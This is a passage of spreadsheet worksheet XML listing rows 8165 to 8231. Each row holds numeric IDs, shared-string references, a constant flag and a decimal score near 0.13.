      </c>
    </row>
    <row r="8165" ht="15.75" customHeight="1">
      <c r="A8165" s="1">
        <v>6758.0</v>
      </c>
      <c r="B8165" s="2">
        <v>4.9403601E7</v>
      </c>
      <c r="C8165" s="2" t="s">
        <v>7758</v>
      </c>
      <c r="D8165" s="2">
        <v>1.0</v>
      </c>
      <c r="E8165" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8165" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8166" ht="15.75" customHeight="1">
      <c r="A8166" s="1">
        <v>11146.0</v>
      </c>
      <c r="B8166" s="2">
        <v>1.9332619E7</v>
      </c>
      <c r="C8166" s="2" t="s">
        <v>7759</v>
      </c>
      <c r="D8166" s="2">
        <v>1.0</v>
      </c>
      <c r="E8166" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8166" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8167" ht="15.75" customHeight="1">
      <c r="A8167" s="1">
        <v>13655.0</v>
      </c>
      <c r="B8167" s="2">
        <v>3.5965629E7</v>
      </c>
      <c r="C8167" s="2" t="s">
        <v>7760</v>
      </c>
      <c r="D8167" s="2">
        <v>1.0</v>
      </c>
      <c r="E8167" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8167" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8168" ht="15.75" customHeight="1">
      <c r="A8168" s="1">
        <v>32244.0</v>
      </c>
      <c r="B8168" s="2">
        <v>5506404.0</v>
      </c>
      <c r="C8168" s="2" t="s">
        <v>7761</v>
      </c>
      <c r="D8168" s="2">
        <v>1.0</v>
      </c>
      <c r="E8168" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8168" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8169" ht="15.75" customHeight="1">
      <c r="A8169" s="1">
        <v>5955.0</v>
      </c>
      <c r="B8169" s="2">
        <v>4.7289141E7</v>
      </c>
      <c r="C8169" s="2" t="s">
        <v>7762</v>
      </c>
      <c r="D8169" s="2">
        <v>1.0</v>
      </c>
      <c r="E8169" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8169" s="2">
        <v>0.1351575456053069</v>
      </c>
    </row>
    <row r="8170" ht="15.75" customHeight="1">
      <c r="A8170" s="1">
        <v>5399.0</v>
      </c>
      <c r="B8170" s="2">
        <v>4.549059E7</v>
      </c>
      <c r="C8170" s="2" t="s">
        <v>7763</v>
      </c>
      <c r="D8170" s="2">
        <v>1.0</v>
      </c>
      <c r="E8170" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8170" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="8171" ht="15.75" customHeight="1">
      <c r="A8171" s="1">
        <v>16974.0</v>
      </c>
      <c r="B8171" s="2">
        <v>4.829897E7</v>
      </c>
      <c r="C8171" s="2" t="s">
        <v>7764</v>
      </c>
      <c r="D8171" s="2">
        <v>1.0</v>
      </c>
      <c r="E8171" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8171" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="8172" ht="15.75" customHeight="1">
      <c r="A8172" s="1">
        <v>2017.0</v>
      </c>
      <c r="B8172" s="2">
        <v>3.0733563E7</v>
      </c>
      <c r="C8172" s="2" t="s">
        <v>7765</v>
      </c>
      <c r="D8172" s="2">
        <v>1.0</v>
      </c>
      <c r="E8172" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8172" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="8173" ht="15.75" customHeight="1">
      <c r="A8173" s="1">
        <v>17863.0</v>
      </c>
      <c r="B8173" s="2">
        <v>5.1007068E7</v>
      </c>
      <c r="C8173" s="2" t="s">
        <v>7766</v>
      </c>
      <c r="D8173" s="2">
        <v>1.0</v>
      </c>
      <c r="E8173" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8173" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="8174" ht="15.75" customHeight="1">
      <c r="A8174" s="1">
        <v>18428.0</v>
      </c>
      <c r="B8174" s="2">
        <v>5.2716174E7</v>
      </c>
      <c r="C8174" s="2" t="s">
        <v>7767</v>
      </c>
      <c r="D8174" s="2">
        <v>1.0</v>
      </c>
      <c r="E8174" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8174" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="8175" ht="15.75" customHeight="1">
      <c r="A8175" s="1">
        <v>2246.0</v>
      </c>
      <c r="B8175" s="2">
        <v>3.2335534E7</v>
      </c>
      <c r="C8175" s="2" t="s">
        <v>7768</v>
      </c>
      <c r="D8175" s="2">
        <v>1.0</v>
      </c>
      <c r="E8175" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8175" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="8176" ht="15.75" customHeight="1">
      <c r="A8176" s="1">
        <v>9822.0</v>
      </c>
      <c r="B8176" s="2">
        <v>5.6626803E7</v>
      </c>
      <c r="C8176" s="2" t="s">
        <v>7769</v>
      </c>
      <c r="D8176" s="2">
        <v>1.0</v>
      </c>
      <c r="E8176" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8176" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="8177" ht="15.75" customHeight="1">
      <c r="A8177" s="1">
        <v>5120.0</v>
      </c>
      <c r="B8177" s="2">
        <v>4.4557237E7</v>
      </c>
      <c r="C8177" s="2" t="s">
        <v>7770</v>
      </c>
      <c r="D8177" s="2">
        <v>1.0</v>
      </c>
      <c r="E8177" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8177" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="8178" ht="15.75" customHeight="1">
      <c r="A8178" s="1">
        <v>24566.0</v>
      </c>
      <c r="B8178" s="2">
        <v>1.1314038E7</v>
      </c>
      <c r="C8178" s="2" t="s">
        <v>7771</v>
      </c>
      <c r="D8178" s="2">
        <v>1.0</v>
      </c>
      <c r="E8178" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8178" s="2">
        <v>0.1340740740740741</v>
      </c>
    </row>
    <row r="8179" ht="15.75" customHeight="1">
      <c r="A8179" s="1">
        <v>1925.0</v>
      </c>
      <c r="B8179" s="2">
        <v>3.0091016E7</v>
      </c>
      <c r="C8179" s="2" t="s">
        <v>7772</v>
      </c>
      <c r="D8179" s="2">
        <v>1.0</v>
      </c>
      <c r="E8179" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8179" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="8180" ht="15.75" customHeight="1">
      <c r="A8180" s="1">
        <v>6586.0</v>
      </c>
      <c r="B8180" s="2">
        <v>4.8971301E7</v>
      </c>
      <c r="C8180" s="2" t="s">
        <v>7773</v>
      </c>
      <c r="D8180" s="2">
        <v>1.0</v>
      </c>
      <c r="E8180" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8180" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="8181" ht="15.75" customHeight="1">
      <c r="A8181" s="1">
        <v>21150.0</v>
      </c>
      <c r="B8181" s="2">
        <v>1.8768202E7</v>
      </c>
      <c r="C8181" s="2" t="s">
        <v>7774</v>
      </c>
      <c r="D8181" s="2">
        <v>1.0</v>
      </c>
      <c r="E8181" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8181" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="8182" ht="15.75" customHeight="1">
      <c r="A8182" s="1">
        <v>1877.0</v>
      </c>
      <c r="B8182" s="2">
        <v>2.9683005E7</v>
      </c>
      <c r="C8182" s="2" t="s">
        <v>7775</v>
      </c>
      <c r="D8182" s="2">
        <v>1.0</v>
      </c>
      <c r="E8182" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8182" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8183" ht="15.75" customHeight="1">
      <c r="A8183" s="1">
        <v>3132.0</v>
      </c>
      <c r="B8183" s="2">
        <v>3.6858263E7</v>
      </c>
      <c r="C8183" s="2" t="s">
        <v>7776</v>
      </c>
      <c r="D8183" s="2">
        <v>1.0</v>
      </c>
      <c r="E8183" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8183" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8184" ht="15.75" customHeight="1">
      <c r="A8184" s="1">
        <v>3368.0</v>
      </c>
      <c r="B8184" s="2">
        <v>3.7899099E7</v>
      </c>
      <c r="C8184" s="2" t="s">
        <v>7777</v>
      </c>
      <c r="D8184" s="2">
        <v>1.0</v>
      </c>
      <c r="E8184" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8184" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8185" ht="15.75" customHeight="1">
      <c r="A8185" s="1">
        <v>6272.0</v>
      </c>
      <c r="B8185" s="2">
        <v>4.8129662E7</v>
      </c>
      <c r="C8185" s="2" t="s">
        <v>7778</v>
      </c>
      <c r="D8185" s="2">
        <v>1.0</v>
      </c>
      <c r="E8185" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8185" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8186" ht="15.75" customHeight="1">
      <c r="A8186" s="1">
        <v>7033.0</v>
      </c>
      <c r="B8186" s="2">
        <v>5.0132447E7</v>
      </c>
      <c r="C8186" s="2" t="s">
        <v>7779</v>
      </c>
      <c r="D8186" s="2">
        <v>1.0</v>
      </c>
      <c r="E8186" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8186" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8187" ht="15.75" customHeight="1">
      <c r="A8187" s="1">
        <v>8266.0</v>
      </c>
      <c r="B8187" s="2">
        <v>5.3428081E7</v>
      </c>
      <c r="C8187" s="2" t="s">
        <v>7780</v>
      </c>
      <c r="D8187" s="2">
        <v>1.0</v>
      </c>
      <c r="E8187" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8187" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8188" ht="15.75" customHeight="1">
      <c r="A8188" s="1">
        <v>10038.0</v>
      </c>
      <c r="B8188" s="2">
        <v>5.7063591E7</v>
      </c>
      <c r="C8188" s="2" t="s">
        <v>7781</v>
      </c>
      <c r="D8188" s="2">
        <v>1.0</v>
      </c>
      <c r="E8188" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8188" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8189" ht="15.75" customHeight="1">
      <c r="A8189" s="1">
        <v>11219.0</v>
      </c>
      <c r="B8189" s="2">
        <v>2.0301695E7</v>
      </c>
      <c r="C8189" s="2" t="s">
        <v>7782</v>
      </c>
      <c r="D8189" s="2">
        <v>1.0</v>
      </c>
      <c r="E8189" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8189" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8190" ht="15.75" customHeight="1">
      <c r="A8190" s="1">
        <v>11970.0</v>
      </c>
      <c r="B8190" s="2">
        <v>2.5717867E7</v>
      </c>
      <c r="C8190" s="2" t="s">
        <v>7783</v>
      </c>
      <c r="D8190" s="2">
        <v>1.0</v>
      </c>
      <c r="E8190" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8190" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8191" ht="15.75" customHeight="1">
      <c r="A8191" s="1">
        <v>12856.0</v>
      </c>
      <c r="B8191" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C8191" s="2" t="s">
        <v>7784</v>
      </c>
      <c r="D8191" s="2">
        <v>1.0</v>
      </c>
      <c r="E8191" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8191" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8192" ht="15.75" customHeight="1">
      <c r="A8192" s="1">
        <v>16462.0</v>
      </c>
      <c r="B8192" s="2">
        <v>4.6457783E7</v>
      </c>
      <c r="C8192" s="2" t="s">
        <v>7785</v>
      </c>
      <c r="D8192" s="2">
        <v>1.0</v>
      </c>
      <c r="E8192" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8192" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8193" ht="15.75" customHeight="1">
      <c r="A8193" s="1">
        <v>18032.0</v>
      </c>
      <c r="B8193" s="2">
        <v>5.153502E7</v>
      </c>
      <c r="C8193" s="2" t="s">
        <v>7786</v>
      </c>
      <c r="D8193" s="2">
        <v>1.0</v>
      </c>
      <c r="E8193" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8193" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8194" ht="15.75" customHeight="1">
      <c r="A8194" s="1">
        <v>19699.0</v>
      </c>
      <c r="B8194" s="2">
        <v>5.6494143E7</v>
      </c>
      <c r="C8194" s="2" t="s">
        <v>7787</v>
      </c>
      <c r="D8194" s="2">
        <v>1.0</v>
      </c>
      <c r="E8194" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8194" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8195" ht="15.75" customHeight="1">
      <c r="A8195" s="1">
        <v>23853.0</v>
      </c>
      <c r="B8195" s="2">
        <v>8246211.0</v>
      </c>
      <c r="C8195" s="2" t="s">
        <v>7788</v>
      </c>
      <c r="D8195" s="2">
        <v>1.0</v>
      </c>
      <c r="E8195" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8195" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8196" ht="15.75" customHeight="1">
      <c r="A8196" s="1">
        <v>26038.0</v>
      </c>
      <c r="B8196" s="2">
        <v>1.5443372E7</v>
      </c>
      <c r="C8196" s="2" t="s">
        <v>7789</v>
      </c>
      <c r="D8196" s="2">
        <v>1.0</v>
      </c>
      <c r="E8196" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8196" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8197" ht="15.75" customHeight="1">
      <c r="A8197" s="1">
        <v>26287.0</v>
      </c>
      <c r="B8197" s="2">
        <v>1.6462648E7</v>
      </c>
      <c r="C8197" s="2" t="s">
        <v>7790</v>
      </c>
      <c r="D8197" s="2">
        <v>1.0</v>
      </c>
      <c r="E8197" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8197" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8198" ht="15.75" customHeight="1">
      <c r="A8198" s="1">
        <v>33539.0</v>
      </c>
      <c r="B8198" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C8198" s="2" t="s">
        <v>7791</v>
      </c>
      <c r="D8198" s="2">
        <v>1.0</v>
      </c>
      <c r="E8198" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8198" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="8199" ht="15.75" customHeight="1">
      <c r="A8199" s="1">
        <v>7824.0</v>
      </c>
      <c r="B8199" s="2">
        <v>5.2311638E7</v>
      </c>
      <c r="C8199" s="2" t="s">
        <v>7792</v>
      </c>
      <c r="D8199" s="2">
        <v>1.0</v>
      </c>
      <c r="E8199" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8199" s="2">
        <v>0.1338028169014085</v>
      </c>
    </row>
    <row r="8200" ht="15.75" customHeight="1">
      <c r="A8200" s="1">
        <v>14601.0</v>
      </c>
      <c r="B8200" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C8200" s="2" t="s">
        <v>7793</v>
      </c>
      <c r="D8200" s="2">
        <v>1.0</v>
      </c>
      <c r="E8200" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8200" s="2">
        <v>0.1338028169014085</v>
      </c>
    </row>
    <row r="8201" ht="15.75" customHeight="1">
      <c r="A8201" s="1">
        <v>13009.0</v>
      </c>
      <c r="B8201" s="2">
        <v>3.2869896E7</v>
      </c>
      <c r="C8201" s="2" t="s">
        <v>7794</v>
      </c>
      <c r="D8201" s="2">
        <v>1.0</v>
      </c>
      <c r="E8201" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8201" s="2">
        <v>0.1335282651072126</v>
      </c>
    </row>
    <row r="8202" ht="15.75" customHeight="1">
      <c r="A8202" s="1">
        <v>8174.0</v>
      </c>
      <c r="B8202" s="2">
        <v>5.3236404E7</v>
      </c>
      <c r="C8202" s="2" t="s">
        <v>7795</v>
      </c>
      <c r="D8202" s="2">
        <v>1.0</v>
      </c>
      <c r="E8202" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8202" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="8203" ht="15.75" customHeight="1">
      <c r="A8203" s="1">
        <v>9295.0</v>
      </c>
      <c r="B8203" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C8203" s="2" t="s">
        <v>7796</v>
      </c>
      <c r="D8203" s="2">
        <v>1.0</v>
      </c>
      <c r="E8203" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8203" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="8204" ht="15.75" customHeight="1">
      <c r="A8204" s="1">
        <v>31125.0</v>
      </c>
      <c r="B8204" s="2">
        <v>4.8871772E7</v>
      </c>
      <c r="C8204" s="2" t="s">
        <v>7797</v>
      </c>
      <c r="D8204" s="2">
        <v>1.0</v>
      </c>
      <c r="E8204" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8204" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="8205" ht="15.75" customHeight="1">
      <c r="A8205" s="1">
        <v>4827.0</v>
      </c>
      <c r="B8205" s="2">
        <v>4.3639761E7</v>
      </c>
      <c r="C8205" s="2" t="s">
        <v>7798</v>
      </c>
      <c r="D8205" s="2">
        <v>1.0</v>
      </c>
      <c r="E8205" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8205" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="8206" ht="15.75" customHeight="1">
      <c r="A8206" s="1">
        <v>10542.0</v>
      </c>
      <c r="B8206" s="2">
        <v>1.2415134E7</v>
      </c>
      <c r="C8206" s="2" t="s">
        <v>7799</v>
      </c>
      <c r="D8206" s="2">
        <v>1.0</v>
      </c>
      <c r="E8206" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8206" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="8207" ht="15.75" customHeight="1">
      <c r="A8207" s="1">
        <v>1869.0</v>
      </c>
      <c r="B8207" s="2">
        <v>2.9604205E7</v>
      </c>
      <c r="C8207" s="2" t="s">
        <v>7800</v>
      </c>
      <c r="D8207" s="2">
        <v>1.0</v>
      </c>
      <c r="E8207" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8207" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8208" ht="15.75" customHeight="1">
      <c r="A8208" s="1">
        <v>3698.0</v>
      </c>
      <c r="B8208" s="2">
        <v>3.9542539E7</v>
      </c>
      <c r="C8208" s="2" t="s">
        <v>7801</v>
      </c>
      <c r="D8208" s="2">
        <v>1.0</v>
      </c>
      <c r="E8208" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8208" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8209" ht="15.75" customHeight="1">
      <c r="A8209" s="1">
        <v>4186.0</v>
      </c>
      <c r="B8209" s="2">
        <v>4.1567781E7</v>
      </c>
      <c r="C8209" s="2" t="s">
        <v>7802</v>
      </c>
      <c r="D8209" s="2">
        <v>1.0</v>
      </c>
      <c r="E8209" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8209" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8210" ht="15.75" customHeight="1">
      <c r="A8210" s="1">
        <v>11312.0</v>
      </c>
      <c r="B8210" s="2">
        <v>2.1037778E7</v>
      </c>
      <c r="C8210" s="2" t="s">
        <v>7803</v>
      </c>
      <c r="D8210" s="2">
        <v>1.0</v>
      </c>
      <c r="E8210" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8210" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8211" ht="15.75" customHeight="1">
      <c r="A8211" s="1">
        <v>13156.0</v>
      </c>
      <c r="B8211" s="2">
        <v>3.3828746E7</v>
      </c>
      <c r="C8211" s="2" t="s">
        <v>7804</v>
      </c>
      <c r="D8211" s="2">
        <v>1.0</v>
      </c>
      <c r="E8211" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8211" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8212" ht="15.75" customHeight="1">
      <c r="A8212" s="1">
        <v>17709.0</v>
      </c>
      <c r="B8212" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C8212" s="2" t="s">
        <v>7805</v>
      </c>
      <c r="D8212" s="2">
        <v>1.0</v>
      </c>
      <c r="E8212" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8212" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8213" ht="15.75" customHeight="1">
      <c r="A8213" s="1">
        <v>18519.0</v>
      </c>
      <c r="B8213" s="2">
        <v>5.3012168E7</v>
      </c>
      <c r="C8213" s="2" t="s">
        <v>7806</v>
      </c>
      <c r="D8213" s="2">
        <v>1.0</v>
      </c>
      <c r="E8213" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8213" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="8214" ht="15.75" customHeight="1">
      <c r="A8214" s="1">
        <v>3722.0</v>
      </c>
      <c r="B8214" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C8214" s="2" t="s">
        <v>7807</v>
      </c>
      <c r="D8214" s="2">
        <v>1.0</v>
      </c>
      <c r="E8214" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8214" s="2">
        <v>0.1331417624521072</v>
      </c>
    </row>
    <row r="8215" ht="15.75" customHeight="1">
      <c r="A8215" s="1">
        <v>21301.0</v>
      </c>
      <c r="B8215" s="2">
        <v>2.0636278E7</v>
      </c>
      <c r="C8215" s="2" t="s">
        <v>7808</v>
      </c>
      <c r="D8215" s="2">
        <v>1.0</v>
      </c>
      <c r="E8215" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8215" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="8216" ht="15.75" customHeight="1">
      <c r="A8216" s="1">
        <v>33793.0</v>
      </c>
      <c r="B8216" s="2">
        <v>8774766.0</v>
      </c>
      <c r="C8216" s="2" t="s">
        <v>7809</v>
      </c>
      <c r="D8216" s="2">
        <v>1.0</v>
      </c>
      <c r="E8216" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8216" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="8217" ht="15.75" customHeight="1">
      <c r="A8217" s="1">
        <v>7732.0</v>
      </c>
      <c r="B8217" s="2">
        <v>5.2035961E7</v>
      </c>
      <c r="C8217" s="2" t="s">
        <v>7810</v>
      </c>
      <c r="D8217" s="2">
        <v>1.0</v>
      </c>
      <c r="E8217" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8217" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="8218" ht="15.75" customHeight="1">
      <c r="A8218" s="1">
        <v>21510.0</v>
      </c>
      <c r="B8218" s="2">
        <v>2.3153601E7</v>
      </c>
      <c r="C8218" s="2" t="s">
        <v>7811</v>
      </c>
      <c r="D8218" s="2">
        <v>1.0</v>
      </c>
      <c r="E8218" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8218" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="8219" ht="15.75" customHeight="1">
      <c r="A8219" s="1">
        <v>74.0</v>
      </c>
      <c r="B8219" s="2">
        <v>1.1731462E7</v>
      </c>
      <c r="C8219" s="2" t="s">
        <v>7812</v>
      </c>
      <c r="D8219" s="2">
        <v>1.0</v>
      </c>
      <c r="E8219" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8219" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8220" ht="15.75" customHeight="1">
      <c r="A8220" s="1">
        <v>1110.0</v>
      </c>
      <c r="B8220" s="2">
        <v>2.4046212E7</v>
      </c>
      <c r="C8220" s="2" t="s">
        <v>7813</v>
      </c>
      <c r="D8220" s="2">
        <v>1.0</v>
      </c>
      <c r="E8220" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8220" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8221" ht="15.75" customHeight="1">
      <c r="A8221" s="1">
        <v>1393.0</v>
      </c>
      <c r="B8221" s="2">
        <v>2.6268039E7</v>
      </c>
      <c r="C8221" s="2" t="s">
        <v>7814</v>
      </c>
      <c r="D8221" s="2">
        <v>1.0</v>
      </c>
      <c r="E8221" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8221" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8222" ht="15.75" customHeight="1">
      <c r="A8222" s="1">
        <v>2149.0</v>
      </c>
      <c r="B8222" s="2">
        <v>3.1628016E7</v>
      </c>
      <c r="C8222" s="2" t="s">
        <v>7815</v>
      </c>
      <c r="D8222" s="2">
        <v>1.0</v>
      </c>
      <c r="E8222" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8222" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8223" ht="15.75" customHeight="1">
      <c r="A8223" s="1">
        <v>2231.0</v>
      </c>
      <c r="B8223" s="2">
        <v>3.2271494E7</v>
      </c>
      <c r="C8223" s="2" t="s">
        <v>7816</v>
      </c>
      <c r="D8223" s="2">
        <v>1.0</v>
      </c>
      <c r="E8223" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8223" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8224" ht="15.75" customHeight="1">
      <c r="A8224" s="1">
        <v>2286.0</v>
      </c>
      <c r="B8224" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C8224" s="2" t="s">
        <v>7817</v>
      </c>
      <c r="D8224" s="2">
        <v>1.0</v>
      </c>
      <c r="E8224" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8224" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8225" ht="15.75" customHeight="1">
      <c r="A8225" s="1">
        <v>2935.0</v>
      </c>
      <c r="B8225" s="2">
        <v>3.5939716E7</v>
      </c>
      <c r="C8225" s="2" t="s">
        <v>7818</v>
      </c>
      <c r="D8225" s="2">
        <v>1.0</v>
      </c>
      <c r="E8225" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8225" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8226" ht="15.75" customHeight="1">
      <c r="A8226" s="1">
        <v>3626.0</v>
      </c>
      <c r="B8226" s="2">
        <v>3.9213798E7</v>
      </c>
      <c r="C8226" s="2" t="s">
        <v>7819</v>
      </c>
      <c r="D8226" s="2">
        <v>1.0</v>
      </c>
      <c r="E8226" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8226" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8227" ht="15.75" customHeight="1">
      <c r="A8227" s="1">
        <v>3705.0</v>
      </c>
      <c r="B8227" s="2">
        <v>3.958042E7</v>
      </c>
      <c r="C8227" s="2" t="s">
        <v>7820</v>
      </c>
      <c r="D8227" s="2">
        <v>1.0</v>
      </c>
      <c r="E8227" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8227" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8228" ht="15.75" customHeight="1">
      <c r="A8228" s="1">
        <v>3788.0</v>
      </c>
      <c r="B8228" s="2">
        <v>3.9940786E7</v>
      </c>
      <c r="C8228" s="2" t="s">
        <v>7821</v>
      </c>
      <c r="D8228" s="2">
        <v>1.0</v>
      </c>
      <c r="E8228" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8228" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8229" ht="15.75" customHeight="1">
      <c r="A8229" s="1">
        <v>4194.0</v>
      </c>
      <c r="B8229" s="2">
        <v>4.1603873E7</v>
      </c>
      <c r="C8229" s="2" t="s">
        <v>7822</v>
      </c>
      <c r="D8229" s="2">
        <v>1.0</v>
      </c>
      <c r="E8229" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8229" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8230" ht="15.75" customHeight="1">
      <c r="A8230" s="1">
        <v>4809.0</v>
      </c>
      <c r="B8230" s="2">
        <v>4.3553511E7</v>
      </c>
      <c r="C8230" s="2" t="s">
        <v>7823</v>
      </c>
      <c r="D8230" s="2">
        <v>1.0</v>
      </c>
      <c r="E8230" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8230" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8231" ht="15.75" customHeight="1">
      <c r="A8231" s="1">
        <v>4881.0</v>
      </c>
      <c r="B8231" s="2">
        <v>4.3851774E7</v>
      </c>
      <c r="C8231" s="2" t="s">
        <v>7824</v>
      </c>
      <c r="D8231" s="2">
        <v>1.0</v>
      </c>
      <c r="E8231" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8231" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
